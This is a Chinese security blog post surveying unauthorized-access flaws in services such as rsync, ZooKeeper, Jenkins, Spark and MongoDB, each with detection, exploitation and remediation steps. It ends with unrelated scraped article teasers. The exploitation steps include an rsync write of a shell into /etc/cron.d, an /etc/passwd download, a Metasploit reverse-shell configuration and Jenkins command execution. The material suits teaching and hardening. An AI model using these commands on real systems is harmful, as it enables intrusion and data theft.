未授权访问漏洞总结

以下总结了常见的未授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~

目录

FTP未授权访问(21)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

LDAP未授权访问(389)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Rsync未授权访问(873)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

ZooKeeper未授权访问(2181)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

 Docker未授权访问(2375)

Docker Registry未授权访问(5000)

漏洞原理

漏洞利用

漏洞修复

Kibana未授权访问(5601)

漏洞原理

漏洞利用

漏洞修复

VNC未授权访问(5900、5901)

漏洞原理

漏洞检测

漏洞利用

修复方法

CouchDB未授权访问(5984)

漏洞原理

漏洞利用

漏洞修复

Apache Spark未授权访问(6066、8081、8082)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Redis未授权访问(6379)

Weblogic未授权访问(7001)

 JBOSS未授权访问(8080)

Jenkins未授权访问(8080)

漏洞原理

漏洞利用

漏洞修复

Kubernetes API Server未授权(8080、10250)

漏洞原理

漏洞利用

漏洞修复

Active MQ未授权访问(8161)

漏洞原理

漏洞利用

漏洞修复

Jupyter Notebook未授权访问(8888)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

Elasticsearch未授权访问(9200、9300)

漏洞原理

漏洞利用

漏洞修复

Zabbix未授权访问(10051)

漏洞原理

漏洞利用

漏洞修复

 Memcached未授权访问(11211)

漏洞原理

漏洞利用

漏洞修复

RabbitMQ未授权访问(15672、15692、25672)

漏洞原理

漏洞利用

漏洞修复

MongoDB未授权访问(27017)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

NFS未授权访问(2049、20048)

漏洞原理

漏洞利用

漏洞修复

Dubbo未授权访问(28096)

漏洞原理

漏洞利用

漏洞修复

Druid未授权访问

漏洞原理

漏洞利用

漏洞修复

Solr未授权访问

漏洞原理

漏洞利用

SpringBoot Actuator 未授权访问

漏洞原理

漏洞利用

漏洞修复

SwaggerUI未授权访问

漏洞利用

修复方法

 Harbor未授权添加管理员漏洞

漏洞原理


FTP未授权访问(21)

FTP即文件传输协议,使用客户/服务器模式与使用 TCP 传输,属于网络传输协议的应用层,默认使用20、21号两个端口,一个数据端口和一个命令端口,端口20是数据端口,用于文件在客户端和服务器之间传输数据流。端口21是命令端口,用于传输控制流,接受客户端发出的相关FTP命令与参数。

漏洞原理

由于FTP使用弱口令或者启用了匿名登录功能,容易被攻击者攻击,发生恶意文件上传或更严重的入侵行为。

漏洞检测

端口扫描检测,可以使用nmap工具。

漏洞利用

使用匿名用户连接

[root@centos7 vsftpd]# ftp 192.168.75.122
Connected to 192.168.75.122(192.168.75.122).
220 (vsFTPd 3.0.2)
Name (192.168.75.122:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/"

有关于FTP匿名登录利用的有一个VSFTPD2.3.4笑脸漏洞:FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透_ftp匿名登录漏洞-CSDN博客

关于这个漏洞,只要用户输入的用户名包含连续的:)字符,就会自动在6200端口打开一个后门。

漏洞修复

  • 禁止匿名登录
  • 配置强密码

LDAP未授权访问(389)

LDAP即轻型目录访问协议,默认使用389端口,LDAP底层一般使用TCP或UDP作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。

漏洞原理

未对LDAP的访问进行密码验证,导致未授权访问。

漏洞检测

检测脚本参考

# python
# _*_  coding:utf-8 _*_
from ldap3 import Connection,Server,ALL
def ldap_anonymous(ip):try:server = Server(ip,get_info=ALL,connect_timeout=1)conn = Connection(server, auto_bind=True)print "[+] ldap login for anonymous"conn.closedexcept:#passprint '[-] checking for ldap anonymous fail'

漏洞利用

使用LdapBrowser直接连入,获取敏感信息。

LDAP是一个用于浏览和管理LDAP服务器的工具。

漏洞修复

  • 修改LDAP的ACL(访问控制列表),禁止匿名访问
  • 设置LDAP访问白名单或黑名单

Rsync未授权访问(873)

Rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAM快速同步多台主机间的文件和目录,默认运行在873端口。

漏洞原理

由于rsync的配置不当,导致允许任何人未授权访问rsync,上传本地文件,下载服务器文件等。

漏洞检测

  • 端口扫描
  • 或者在kali使用rsync命令进行检测
rsync rsync://ip:873/

漏洞利用

可以直接使用rsync工具进行利用

#利用rsync下载passwd文件
rsync rsync://ip:873/src/etc/passwd ./
#查看下载的passwd文件
cat passwd#利用rsync写入shell文件
rsync -av shell rsync://ip:873/src/etc/cron.d/shell

漏洞修复

更改rsync默认配置文件/etc/rsyncd.conf,添加或修改参数:

  • 访问控制;设置host allow,限制允许访问主机的IP。

  • 权限控制;设置read only,将模块设置成只读。

  • 访问认证;设置auth、secrets,认证成功才能调用服务。

  • 模块隐藏;设置list,将模块隐藏。

ZooKeeper未授权访问(2181)

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。

漏洞原理

ZooKeeper默认开放2181端口,没有对ZooKeeper进行访问控制,攻击者可通过执行envi命令获得系统大量的敏感信息包括系统名称、Java环境等,任意用户在网络可达的情况下可以进行未授权读取数据甚至杀死服务。

漏洞检测

使用nmap扫描端口

漏洞利用

#列出连接的客户端的统计信息
stat |ncat ip 2181#测试服务器是否正常运行
echo ruok |ncat ip 2181#列出未完成的请求
echo reqs |ncat ip 2181#打印有关服务环境的详细信息
echo envi |ncat ip 2181#列出未完成的会话和临时节点
echo dump |ncat ip 2181

漏洞修复

  • 为ZooKeeper配置相应的访问权限
  • 设置防火墙策略
  • 禁止把ZooKeeper直接暴露在公网

 Docker未授权访问(2375)

Docker未授权访问漏洞详解-CSDN博客

Docker Registry未授权访问(5000)

漏洞原理

默认5000端口,开放远程API,可以docker命令,通过url操作docker。

漏洞利用

端口扫描检测

#获取仓库列表
http://ip:5000/v2/_catalog#获取指定仓库中镜像的tags列表
http://ip:5000/v2/geoglobe-servicemgr/tags/list

漏洞修复

设置ACL,只允许信任ip进行连接。

Kibana未授权访问(5601)

Kibana 是一款开源的数据分析和可视化平台,它是 Elastic Stack 成员之一,设计用于和 Elasticsearch 协作。可以使用 Kibana 对 Elasticsearch 索引中的数据进行搜索、查看、交互操作。

漏洞原理

kibana没有做安全的登录认证,外部能够随意访问数据,造成数据泄露。

漏洞利用

未授权访问的页面,无需账号密码可以直接登录。

http://192.168.126.130:5601/

https://192.168.126.130/app/kibana#

http://192.168.126.130:5601/app/kibana#/

漏洞修复

  • 设置kibana监听本地地址,并设置ElasticSearch登录的账号和密码;
  • 设置防火墙策略,限定IP访问服务;

VNC未授权访问(5900、5901)

VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。

漏洞原理

默认端口为5900、5901.VNC未授权访问可以造成恶意用户直接控制受控主机。

漏洞检测

检测可以使用nmap进行扫描,查看是否开放5900、5901端口。

可以使用msfconsole工具检测模块进行批量检测

(1) 在 kali 下运行 msfconsolemsfconsole。

(2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnxnoneauth。

(3) 显示有哪些选项show options。

(4) 设置地址段set rhosts ip 或 段。

(5) 设置线程set threads 50。

(6) 开始扫描run。

漏洞利用

直接使用VNC客户端输入目标服务器IP进行连接即可,连接成功可以控制目标服务器。

修复方法

(1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。

(2) 以最小权限的普通用户身份运行操作系统。

CouchDB未授权访问(5984)

Apache CouchDB 是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。

漏洞原理

HTTP Server默认开启,且没有进行验证,绑定在0.0.0.0上,所有用户均可以通过API访问导致未授权访问。在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。

漏洞利用

使用nmap扫描端口

然后未授权访问其页面,也可以通过curl拉取页面信息

curl ip:5984/_config

漏洞修复

  • 指定CouchDB绑定的IP:在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1,修改后只有本机才能访问。
  • 设置访问密码:在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。
  • 设置www-authenticate,强制认证。

Apache Spark未授权访问(6066、8081、8082)

Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。

漏洞原理

如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向master节点提交一个应用,master节点会分发给slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁spark集群整体的安全性。

漏洞检测

nmap扫描开放端口

漏洞利用

使用msf工具进行getshell

use exploit/linux/http/spark_unauth_rceset payload java/meterpreter/reverse_tcpset rhost 目标ipset rport 6066set lhost 攻击机ipset lport 4444set srvhost 攻击机ipset srvport 8080exploit

漏洞修复

  • 对外关闭敏感端口;
  • 配置用户权限认证;

Redis未授权访问(6379)

Redis未授权访问漏洞详解(全面)_redis未授权访问漏洞编号-CSDN博客

Weblogic未授权访问(7001)

Weblogic常见漏洞详解_weblogic漏洞-CSDN博客

 JBOSS未授权访问(8080)

JBOSS未授权漏洞漏洞总结-CSDN博客

Jenkins未授权访问(8080)

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞原理

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

漏洞利用

使用nmap进行端口扫描

输入url,进行未授权访问

http://ip:8080/managehttp://ip:8080/script

然后在后台页面执行系统命令

#命令格式
println 'whoami'.execute().text

漏洞修复

  • 对后台控制页面做登录验证限制;
  • 升级Jenkins至新版本;
  • 禁止把Jenkins直接暴露在公网;

Kubernetes API Server未授权(8080、10250)

Kubernetes 是一个全新的基于容器技术的分布式架构解决方案,是 Google 开源的一个容器集群管理系统,Kubernetes 简称 K8S。

漏洞原理

kubernets服务正常启动后会开放两个端口:Localhost Port(默认8080)、Secure Port(默认6443)。这两个端口都提供了API Server,一个通过web访问(而10250端口是kubelet API的HTTPS端口),一个通过kubectl客户端进行调用。如果没有进行合理的配置验证和权限,那么攻击者可以通过这两个接口去获取容器的权限。

漏洞利用

使用nmap进行端口扫描

访问https://ip/10250/pods获取环境变量、运行的容器信息、命名空间等信息。

漏洞修复

  • 进行授权认证;
  • 使用Service Account令牌;
  • 设置防火墙策略,限定IP访问服务;

Active MQ未授权访问(8161)

ActiveMQ是一款流行的开源消息服务器(就是消息中间件)。

漏洞原理

ActiveMQ服务是默认没有配置安全参数的,这导致攻击者可以在默认配置下发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。

漏洞利用

默认配置下,默认端口为8161,默认账号/密码为admin/admin

漏洞修复

  • 禁止未授权访问:修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true
  • 设置强口令:修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码

Jupyter Notebook未授权访问(8888)

Jupyter Notebook是一个交互式笔记本,支持运行 40 多种编程语言,用于创建和共享程序文档,支持实时代码。

漏洞原理

如果管理员未配置密码,将导致未授权访问漏洞,攻击者可以在其中创建一个console并很仔细任意python代码和命令。

漏洞利用

靶场搭建

这里使用vulhub搭建漏洞

cd vulhub/jupyter/notebook-rce
docker-compose up -d

漏洞利用

访问http://ip:8888未授权进入后台页面

然后在New->Terminal创建控制台

便可以执行任意命令

漏洞修复

  • 开启身份验证,防止未经授权用户访问。
  • 访问控制策略,限制IP访问,绑定固定IP。

Elasticsearch未授权访问(9200、9300)

Elasticsearch是一款Java编写的企业级搜索服务引擎。被广泛应用于实时日志分析处理、信息检索、以及数据的多维查询和统计分析等场景。

漏洞原理

启动服务默认会开放9200端口或9300端口,可被攻击者未授权访问进行非法操作。

漏洞利用

使用nmap进行端口扫描

然后访问url,查看敏感数据

http://localhost:9200http://localhost:9200/_cat/    //查看目录http://localhost:9200/_cat/indiceshttp://localhost:9200/_river/_search //查看数据库敏感信息http://localhost:9200/_nodes         //查看节点数据http://localhost:9200/_plugin/head/  //web管理界面(安装了head插件)

漏洞修复

  • 访问控制策略,限制IP访问,绑定固定IP;
  • 在config/elasticsearch.yml中为9200端口设置认证等;

Zabbix未授权访问(10051)

Zabbix是一个基于web界面的提供分布式系统监视以及网络监控功能的企业级的开源解决方案。

漏洞原理

如果管理员没有更改默认配置,那么默认开放端口为10051,且无需账号密码即可登录后台。其中web后台是由PHP编写,用来显示数据库中的结果。

漏洞利用

使用nmap进行端口扫描

然后无需账号密码即可访问后台页面:http://ip:8080/zabbix.php

漏洞修复

  • 设置Zabbix的复杂口令,禁用Guest登录功能;
  • zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;
  • 禁止agent执行run,不要设置EnableRemoteCommands=1;

 Memcached未授权访问(11211)

Memcached是由C语言编写的一个自由开源的、高性能的、分布式的内存对象缓存系统。内存存储可以减少数据库访问次数,提高Web应用次数。

Memcached与Redis有一些相似,它们都是内存存储数据库。不同点就是Memcached可以存储图图片、视频等数据,但是Redis可以存储list、set等的复杂数据类型,而Memcached只支持存储简答的数据类型,而且Redis只使用单核,而Memcached是可以使用多核的。总而言之,Redis适合存储小数据,Memcached适合存储大数据。

漏洞原理

依然是不需要密码即可访问。

默认端口为11211.

漏洞利用

1、使用nmap进行远程扫描,存在11211端口

nmap -p 11211 rhost-ip

2、使用telent远程登录,可以直接登录成功

telnet rhost-ip

漏洞修复

  • 如果Memcached只在内网使用,可在Memcached启动的时候指定绑定的IP地址为127.0.0.1.
memcached -d -m 1024 -u root -l 127.0.0.1-p 11211 -c 1024 -P /tmp/memcached.pid
  • 如果Memcached需要对外提供服务,可以配置iptables规则进行访问控制
#配置iptables规则,只允许192.168.15.249对11211端口进行访问
iptables -A INPUT -p tcp -s 192.168.15.249 --dport 11211 -j ACCEPT#保存规则
service iptables save#重启iptables
service iptables restart

RabbitMQ未授权访问(15672、15692、25672)

RabbitMQ是非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。

漏洞原理

在默认配置下,账号密码已知,且默认端口对外开放,攻击者可以未授权访问窃取数据。

漏洞利用

使用端口扫描

访问url页面,默认账号密码都为guest

http://ip:15672http://ip:15692http://ip:25672

漏洞修复

  • 修改为强密码,删除默认的账号guest;
  • 禁止对外网开放,仅限于内部访问;

MongoDB未授权访问(27017)

MongoDB数据库由C++编写,主要是为了提供Web应用提供可扩展的高性能数据存储解决方案。MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。它支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。

漏洞原理

MongoDB数据库安装完成之后默认空口令导致攻击者无需账号就可以直接登录,进行增删改查操作。

默认端口:27017

漏洞利用

靶场搭建

攻击机:kai

靶机:Ubuntu(需要使用docker环境搭建)

1、拉取MongoDB镜像文件

docker pull mongo

2、创建容器并将MongoDB运行

docker run -d -p 27017:27017 mongo

3、查看运行端口

docker ps -a

4、攻击机扫描端口

漏洞利用

参考链接:MongoDB 未授权访问漏洞利用-CSDN博客

1、在kali里面导入MongoDB公共GPG密钥:

wget -qO - https://www.mongodb.org/static/pgp/server-5.0.asc | sudo apt-key add -

2、创建一个列表用于配置下载列表和下载源

echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/5.0 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-5.0.list

3、重新加载更新源

apt-get update

4、安装MongoDB的最新稳定版本

apt-get install -y mongodb-org

 如果这里出现libssl1.1不能下载的报错,可以更新源,然后再次进行下载。解决方法参考:解决E: Unable to correct problems, you have held broken packages.(亲测有效)-CSDN博客

5、启动MongoDB进程

systemctl start mongod

6、直接使用命令进行连接(无口令连接)

mongo --host 192.168.122.1 --port 27017

7、连接后即可查看用户、数据库等信息。

8、然后创建一个管理员账号

#切换到admin库:
> use admin
switched to db admin#创建用户
> db.createUser({user: "myUserAdmin",pwd: "Passw0rd",roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]}
)#创建成功后提示信息:Successfully added user: {"user" : "myUserAdmin","roles" : [{"role" : "userAdminAnyDatabase","db" : "admin"}]
}

9、ssh登录系统,账号密码为上面创建账户的账号密码。

除了上面较复杂的过程,也可以使用msf集成工具进行攻击。

在探测存在27017端口后,可以使用

msf6 > use auxiliary/scanner/mongodb/mongodb_login

漏洞修复

  • 如果mongodb只需在本地使用,建议只在本地开启监听服务
  • 如果mongodb只对内网提供服务,简体禁止将MongoDB服务发布在互联网上,并在主机上通过防火墙限制访问源IP
  • 最大的漏洞成因就是可以无口令进行登录,所以建议启动基于角色的登录认证功能。

NFS未授权访问(2049、20048)

NFS是UNIX表示层协议,能让使用者访问网络别处的文件就像在使用自己计算机一样。

漏洞原理

NFS配置不当,未限制对外访问,导致共享目录泄露。

漏洞利用

#安装nfs客户端
apt install nfs-common#查看nfs服务器上的共享目录
showmount -e ip#挂载到本地
mount -t nfs ip:/grdata /mnt#卸载共享目录
umount /mnt

或者在windows系统上也可以直接利用映射网络驱动器。

漏洞修复

  • 利用iptables限制端口2049和20048端口的访问,禁止外部访问;
  • 设置/etc/exports,对访问进行控

Dubbo未授权访问(28096)

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。

漏洞原理

因配置不当而导致未授权访问漏洞

漏洞利用

扫描端口后直接连接进入dubbo服务

#连接进入dubbo服务
telent ip port#查看框架情况
status -l

漏洞修复

  • 配置dubbo认证;
  • 设置防火墙策略,限定IP访问;

Druid未授权访问

Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。

漏洞原理

首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。

漏洞利用

无需登录,即可登录Druid监控页面,访问以下url

/druid/index.html/druid/websession.html/druid/datasource.html/druid/sql.html/druid/spring.html

漏洞修复

  • 配置访问账号密码;
  • 禁止对外网开放访问;

Solr未授权访问

Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。

漏洞原理

配置不当导致可以任意未授权访问,可查询所有数据库信息,甚至可读取系统任意文件,获取shell。

漏洞利用

访问如下url

http://xx.xx.com/solr/adminhttps://xx.xx.com/solr/admin

漏洞修复

  • 配置solr访问控制权限;
  • 禁止将solr暴露在公网;

SpringBoot Actuator 未授权访问

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。

漏洞原理

在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。

漏洞利用

 

漏洞修复

  •     禁用/env接口;
  •     升级到SpringBoot Actuator 2.0;
  •     禁止对外开放;

SwaggerUI未授权访问

Swagger 是一个规范且完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。

漏洞利用

访问以下url

/api

/api-docs

/api-docs/swagger.json

/api.html

/api/api-docs

/api/apidocs

/api/doc

/api/swagger

/api/swagger-ui

/api/swagger-ui.html

/api/swagger-ui.html/

/api/swagger-ui.json

/api/swagger.json

/api/swagger/

/api/swagger/ui

/api/swagger/ui/

/api/swaggerui

/api/swaggerui/

/api/v1/

/api/v1/api-docs

/api/v1/apidocs

/api/v1/swagger

/api/v1/swagger-ui

/api/v1/swagger-ui.html

/api/v1/swagger-ui.json

/api/v1/swagger.json

/api/v1/swagger/

/api/v2

/api/v2/api-docs

/api/v2/apidocs

/api/v2/swagger

/api/v2/swagger-ui

/api/v2/swagger-ui.html

/api/v2/swagger-ui.json

/api/v2/swagger.json

/api/v2/swagger/

/api/v3

/apidocs

/apidocs/swagger.json

/doc.html

/docs/

/druid/index.html

/graphql

/libs/swaggerui

/libs/swaggerui/

/spring-security-oauth-resource/swagger-ui.html

/spring-security-rest/api/swagger-ui.html

/sw/swagger-ui.html

/swagger

/swagger-resources

/swagger-resources/configuration/security

/swagger-resources/configuration/security/

/swagger-resources/configuration/ui

/swagger-resources/configuration/ui/

/swagger-ui

/swagger-ui.html

/swagger-ui.html#/api-memory-controller

/swagger-ui.html/

/swagger-ui.json

/swagger-ui/swagger.json

/swagger.json

/swagger.yml

/swagger/

/swagger/index.html

/swagger/static/index.html

/swagger/swagger-ui.html

/swagger/ui/

/Swagger/ui/index

/swagger/ui/index

/swagger/v1/swagger.json

/swagger/v2/swagger.json

/template/swagger-ui.html

/user/swagger-ui.html

/user/swagger-ui.html/

/v1.x/swagger-ui.html

/v1/api-docs

/v1/swagger.json

/v2/api-docs

/v3/api-docs

修复方法

设置访问权限

 Harbor未授权添加管理员漏洞

漏洞原理

Harbor未授权添加任意管理员漏洞。攻击者可通过构造特定的字符串,在未授权的情况下直接创建管理员账号,从而接管Harbor镜像仓库。

参考这篇文章:Harbor未授权创建管理员漏洞(CVE-2019-16097)_harbor未授权添加管理员漏洞-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/29341.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Mongodb介绍及window环境安装

本文主要内容为nosql数据库-MongoDB介绍及window环境安装。 目录 什么是MongoDB? 主要特点 MongoDB 与Mysql对应 安装MongoDB 下载MongoDB 自定义安装 创建目录 配置环境变量 配置MongoDB服务 服务改为手动 启动与关闭 安装MongoDB Shell 下载安装包 …

三:SpringBoot的helloworld和使用Springboot的优点以及快速创建Springboot应用

三:SpringBoot的helloworld和使用Springboot的优点以及快速创建Springboot应用 一:HelloWorld [我们创建的是maven项目或者直接创建一个Spring] 1.1:创建一个maven 项目(1】:需要自己手动写一个SpringBoot 的启动类同…

为什么网上这么多破解 Intellij IDEA 的工具,但是官方却不管呢?

大家好,我是小2,一个程序员~ 程序员小2 每天一篇技术重磅好文,涉及一线互联网大厂应用架构(高可用、高性能、高稳定),AI、大数据、java架构等热门领域。 112篇原创内容 公众号 来源:Java知音…

基于Spring Boot+VUE旅游管理系统

1管理员功能模块 管理员通过点击后台管理,进入页面可以输入用户名、密码、角色进行登录相对应操作,如图1所示。 图1管理员登录界面 管理员通过点击后台管理,进入页面可以填写首页、个人中心、用户管理、旅游方案管理、旅游购买管理、系统管…

HarmonyOS NEXT 从不懂到 ToDo List 实例开发

本文将从一个前端开发者的角度出发,速通鸿蒙 Next 开发的方方面面,并最终开发一个 Todo List 小实例。 简介 首先,鸿蒙使用 ArkTS 作为原生开发语言。如果你熟悉 TypeScript 编程语言,那基本上可以无缝过渡,因为 Ark…

Linux常⽤服务器构建-samba

目录 1. 介绍 2. 安装 3. 配置 3.1 创建存放共享⽂件的路径 3.2 创建samba账户 4 重启samba 5. 访问共享⽂件 5.1 mac下访问⽅式 5.2 windows下访问⽅式 1. 介绍 Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的⼀个免费软件,能够完成在 windows 、 mac 操作系统…

统计分析方法-非参数检验-python

文章目录 前言非参数检验特点常见的非参数检验一、Cliffs Delta动机定义二、Wilcoxon Signed-Rank Test定义三、 Friedman检验适用场景公式python 代码Wilcoxon Signed-Rank Test和 cliffs deltaFriedman前言 记录一下自非参数检验的学习过程,如有不对请纠正。 非参数检验 …

[AI资讯·0618] 快手AI模型“可灵“在质量优于Sora,OpenAI和谷歌发布新技术推动AI视频推理发展,Gemini1.5Pro在该榜单中表现突出

AI资讯 陕西推出AI千亿级发展计划,五大产业集群,智算超3000P试了快手的视频AI,竟然有点领先“技术故障”背刺巴菲特,金融大模型到底靠不靠谱?Gemini视频推理遥遥领先GPT-4o,首个视频多模态基准Video-MME国…

dockerhub无法拉取镜像后,国内怎么拉取镜像?

一、比如你拉取的镜像在hub.docker 你要拉取的镜像前面加前缀: m.daocloud.io 这里比如我要拉取: nginx-ingress:latest 正常我们是 docker pull nginx/nginx-ingress 现在因为某些原因,我们需要下面这样写: docker pull …

重新定义DPU——中科驭数2024产品发布会,6月19日诚邀莅临!

数据中心正经历着前所未有的变革,DPU作为数据中心第三颗主力芯片,正引领行业步入一个高效、灵活的算力新时代。 中科驭数在业内率先完成三代DPU芯片研发迭代,并完成规模化商用落地。一路以来,我们衷心地感谢客户和合作伙伴的鼎力…

避雷!又6本期刊被On Hold!ELSEVIER旗下影响因子高达10+SSCI上榜

【SciencePub学术】继《INFORMATION SCIENCES》被On Hold 之后,又新增3本SCIE期刊、3本SSCI期刊被列入On Hold名单。其中包含ELSEVIER旗下影响因子高达10的《RESOURCES POLICY》。 官方现在对期刊质量的管控越来越严格了,被标记为On Hold后的期刊中&…

【自动驾驶】串口通信控制与反馈

文章目录 串口通信控制与反馈通讯协议上行数据帧解析下行数据帧解析串口通信控制与反馈 通讯协议 上行数据指的是机器人底盘向上位机发送的状态数据, 下行数据指的是上位机向机器人底盘发送的控制信息。 上行数据帧解析 机器人运动底盘通过串口发送的数据包格式,如下表所…

SQL Server入门-SSMS简单使用(2008R2版)-1

环境: win10,SQL Server 2008 R2 参考: SQL Server 新建数据库 - 菜鸟教程 https://www.cainiaoya.com/sqlserver/sql-server-create-db.html 第 2 课:编写 Transact-SQL | Microsoft Learn https://learn.microsoft.com/zh-cn/…

LabVIEW电池管理系统测试平台

随着混合动力汽车技术的快速发展,对电池管理系统(BMS)的测试需求显著增加。利用LabVIEW软件开发了一款电池管理系统测试平台,通过模拟电池行为验证BMS的控制策略,从而降低成本、缩短开发周期,并提高整车的能…

基于MYSQL的JAVA初级优化措施

世界是草台班子,这句话视乎很流行! 经历过几家创业公司的项目优化,以及大公司项目. 很多优化非常初级,用心点都能自己找出来! 其实主要原因当初是为了赶进度,能省则省.什么设计啊? 什么性能压测啊. 都省掉吧! 质量都要靠测试人员帮忙找出来,更何况是性能问题呢! 那怕是配齐了…

线上扭蛋机小程序开发,潮玩时代的创新发展

随着互联网的发展,扭蛋机市场也进行了创新发展,线上扭蛋机小程序为市场带来了新活力。扭蛋机小程序将传统的模式与互联网结合,打造一个便捷有趣的扭蛋机市场。 一、扭蛋机小程序 在扭蛋机小程序上,用户通过扭蛋机抽取各种系列的…

如何查看Linux系统中占用CPU资源高的进程

在Linux系统中,管理进程并监控其资源使用情况是一项重要的任务。当系统性能下降或响应变慢时,通常是由于某个或多个进程占用了过多的CPU资源。为了找出这些进程并采取相应的措施,我们可以使用多种命令行工具。以下是几种常用的方法&#xff0…

Ubuntu乌班图安装VIM文本编辑器工具

系列文章目录 Ubuntu-24.04-live-server-amd64安装界面中文版 Ubuntu-24.04-live-server-amd64启用ssh Ubuntu安装qemu-guest-agent 文章目录 系列文章目录前言一、安装VIM?二、VIM基本设置总结 前言 从centos转到Ubuntu发现默认安装没有vi 一、安装VIM&#xff1…

SpringMVC系列十一: 文件上传与自定义拦截器

文章目录 SpringMVC文件上传基本介绍需求分析 / 图解应用实例-代码实现 自定义拦截器什么是拦截器自定义拦截器执行流程分析图自定义拦截器应用实例快速入门注意事项和细节Debug执行流程 多个拦截器多个拦截器执行流程示意图应用实例1代码实现注意事项和细节 应用实例2 作业布置…

HTML 全局属性介绍及示例

HTML 全局属性是一组可以在任何HTML元素中使用的属性。这些属性提供了一种方式来定义元素的通用行为或外观。以下是一些常见的HTML全局属性及其示例。 id id 属性为元素提供了一个唯一的标识符。它不能在 <head>, <html>, <meta>, <script>, <sty…